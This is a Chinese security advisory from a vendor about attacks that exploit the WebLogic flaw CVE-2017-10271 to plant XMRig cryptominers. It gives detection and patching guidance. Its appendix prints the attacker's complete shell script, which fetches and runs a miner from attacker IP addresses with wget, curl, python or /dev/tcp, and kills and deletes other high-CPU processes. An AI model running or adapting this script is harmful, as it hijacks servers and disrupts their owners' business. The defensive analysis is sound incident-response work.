警惕丨WebLogic漏洞攻击集中爆发，部委、能源、银行等政企用户需格外留意

内容简介：警惕丨WebLogic漏洞攻击集中爆发，部委、能源、银行等政企用户需格外留意

攻击事件概述

近日，中睿天下部署在用户处的 「 睿眼 」 设备，抓到数起黑客 利用WebLogic漏洞 对服务器发起的攻击行为，并作出 致命等级的未知威胁告警 。

进一步分析后， 基本确定是利用WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）攻击，拿到系统权限后，下载并执行矿机程序进行虚拟货币挖矿。

与2017年12月爆发的Weblogic漏洞挖矿事件相比，此次攻击更恶劣的是为获取更高的CPU占用率杀掉用户的非矿机进程， 从而导致用户主机宕机，严重影响正常的业务 。

此次攻击使用的门罗币矿机程序为XMRig，代码托管在平台GitHub。而其利用的WebLogic XMLDecoder反序列化漏洞，早在 2017 年9月睿眼就已发现针对此漏洞的攻击 。

目前该漏洞处于 集中爆发期 。 「 部委、银行、能源 」 等用户均已受到影响，大量主机失陷，预计后续会有更多的用户受到影响。

中睿天下已立刻成立应急响应小组，级别为红色。

▲ 「 睿眼 」 9 月告警WebLogic漏洞攻击

攻击过程分析

❖ IP 扫描：攻击者 在互联网上扫描存在 CVE-2017-10271 漏洞的机器，确定攻击目标 IP 。

❖  漏洞利用：攻击者对筛选出的 IP 发动攻击，利用此漏洞获得命令执行的权限 。

❖  矿机植入：漏洞利用成功后，会 去指定位置下载适合目标系统的挖矿 工具 进行挖矿 ，并伴随顽固启动程序。

❖  杀掉进程：挖矿程序启动后， 强行停止占用CPU过高的进程，导致业务中断。

样本分析

该命令执行脚本主要提供下载功能和杀掉主机上占用cpu高的进程。

详细分析命令执行脚本（详情见文末附录），中睿天下发现黑客主要通过构造以下几个模块顺序攻击：

 checkCmd()  // 检查操作系统

 pkill python;pkill perl; pkill $mName  // 首先杀掉所有 python 、 perl 、 java 脚本；

 downloader ()  // 提供wget、curl、python、socket四种下载方式下载矿机程序；

 runer()  // 当检测到服务器不存在挖矿程序时，立即下载挖矿程序，存为”java” ,修改为最高权限，并调起；

 killer()  // 检测到服务器中存在cpu占用超过60%，且非矿机的进程，直接杀掉；

 while 语句  //循环执行该命令；

▲ 「睿眼」捕获Weblogic攻击流量包

▲ 脚本 「 杀掉 」进程 并 「 下载 」矿机 程序

攻击影响范围

• ❖  WebLogic Server 10.3.6.0.0
• ❖  WebLogic Server 12.1.3.0.0
• ❖  WebLogic Server 12.2.1.1.0
• ❖  WebLogic Server 12.2.1.2.0

中睿建议

1，如何检测是否被攻击？

登录睿眼攻击溯源系统-web版，点击【威胁分析】->【全局分析】，参数搜索填写：*wls-wsal* 或 wls- 即可，HTTP状态码可搜索：!500 （状态码为500的可能为攻击成功数据包）。 （见下图）

▲ 「 睿眼 」 检测是否被攻击

2，发现已中招，如何处置威胁？

（ 1 ）更新补丁：

官方已发布修复补丁，建议立即排查资产并更新补丁。网址如下：

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

（ 2 ）删除组件

❖  在不影响业务的情况下，删除 WebLogic 的 wls-wsat 应用包。

rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war

rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

❖  重启 WebLogic 服务或系统后，确认以下链接访问是否为 404

http://ip:port/wls-wsat/CoordinatorPortType11

3，本次处置后，如何针对此黑客持续监测主动防御

虽本次事件定性为恶意挖矿，但不排除黑客利用权限进行下一步渗透 。用户可在攻击溯源系统-网络版->威胁情报->配置管理->黑IP模块中添加IP，添加后睿眼可监控所有服务器和黑客IP的连接记录。

▲ 添加威胁情报进行持续监控

总结

相比2017年12月底发布的威胁情报预警，此次攻击的黑客团队数量扩大，攻击的规模更大，性质也更恶劣——除了下载挖矿程序外，还会丧心病狂地杀掉非矿机进程，从而导致主机宕机，影响正常的业务。

早在2017年9月，中睿天下睿眼就已发现针对此漏洞的攻击。目前该漏洞处于 集中爆发 期，「部委、银行、能源」等用户均已受到影响，大量主机中招，预计后续会有更多用户受影响。中睿天下已立刻成立应急响应小组，级别为 红色 。

如果您发现主机已被黑客攻击成功，或不确定主机是否存在风险，欢迎致电中睿天下技术团队寻求帮助。中睿天下将持续关注该漏洞的最新进展。

中睿天下联系电话：4008-232-911。

附录

❖  http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html 官方补丁链接

❖  https://community.oracle.com/thread/4109711 甲骨文社区关于 CVE-2017-10271 漏洞 攻击的交流互动

❖  攻击者执行命令样本：

#!/bin/sh

sPid=$$

mPid=”

mName=’java’

checkCmd() {

command -v $1 >/dev/null 2>&1

}

downloader () {

if checkCmd wget; then

wget $1 -O $2

elif checkCmd curl; then

curl $1 -o $2

elif checkCmd python; then

if [ "`python -c "import sys;print(sys.version_info[0])”`” = “3″ ]; then

python -c “from urllib.requestimport urlopen; u = urlopen(‘”$1″‘); localFile =open(‘”$2″‘, ‘wb’); localFile.write(u.read());localFile.close()”

else

python -c “from urllib importurlopen; u = urlopen(‘”$1″‘); localFile = open(‘”$2″‘,’wb’); localFile.write(u.read()); localFile.close()”

fi

else

cat < /dev/tcp/165.227.215.25/5555> $2

fi

chmod +x $2

}

killer() {

for tmpVar in `ps -aeo pid,%cpu,command |sed 1d | sort -k 2 | tail -n 10 | awk ‘{print $1}’`; do

if [ $tmpVar = $sPid ]; then

continue

fi

if [ $tmpVar = $mPid ]; then

continue

fi

if [ `ps -o %cpu $tmpVar | sed 1d | sed's/\..*//g'` -ge 60 ]; then

if [ `ps $tmpVar | sed 1d | awk'{print $5}' | grep java` ]; then

continue

fi

if [ `ps $tmpVar | sed 1d | awk'{print $5}' | grep sh` ]; then

continue

fi

if [ `ps $tmpVar | sed 1d | awk'{print $5}' | grep bash` ]; then

continue

fi

kill -9 $tmpVar

rm -f `ls -l /proc/$tmpVar/exe 2

&1 | sed ‘s/.*->//g’`

fi

done

}

runer() {

if [ -z "$mPid" ]; then

if [ ! -f $mName ]; then

downloader http://165.227.215.25/java $mName

fi

chmod +x ./$mName

./$mName

fi

mPid=`ps -eo pid,command | grep $mName |head -n 1 | awk ‘{print $1}’`

}

pkill python; pkillperl; pkill $mName

downloader http://45.77.245.237/java $mName

runer

killer

while true; do

sleep 10

if ps -p $mPid > /dev/null; then

killer

else

mPid=”

runer

fi

done

以上就是本文的全部内容，希望本文的内容对大家的学习或者工作能带来一定的帮助，也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

• 2018勒索病毒白皮书 (政企篇)
• 2018勒索病毒白皮书(政企篇)
• 1月政企终端安全态势分析报告
• Matrix勒索病毒PRCP变种侵入政企单位
• 2019年4月政企终端安全态势分析报告
• 新型蠕虫病毒攻击服务器，政企电脑变矿机

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。